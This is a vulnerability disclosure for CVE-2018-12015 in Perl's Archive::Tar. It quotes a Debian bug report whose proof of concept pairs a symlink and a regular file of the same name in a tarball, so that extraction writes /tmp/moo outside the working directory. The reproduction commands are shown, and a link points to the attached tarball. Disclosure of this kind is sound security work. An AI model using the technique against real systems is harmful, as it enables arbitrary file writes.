Subject: | CVE-2018-12015 directory traversal vulnerability |
As reported to the Debian BTS[1] Archive-Tar has a symlink-related directory traversal vulnerability:
-----
By default, the Archive::Tar module doesn't allow extracting files
outside the current working directory. However, you can bypass this
secure extraction mode easily by putting a symlink and a regular file
with the same name into the tarball.
I've attached proof of concept tarball, which makes Archive::Tar create
/tmp/moo, regardless of what the current working directory is:
$ tar -tvvf traversal.tar.gz
lrwxrwxrwx root/root 0 2018-06-05 18:55 moo -> /tmp/moo
-rw-r--r-- root/root 4 2018-06-05 18:55 moo
$ pwd
/home/jwilk
$ ls /tmp/moo
ls: cannot access '/tmp/moo': No such file or directory
$ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'
$ ls /tmp/moo
/tmp/moo
-----
The attachment is here: https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=900834;filename=traversal.tar.gz;msg=3
[1] <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834>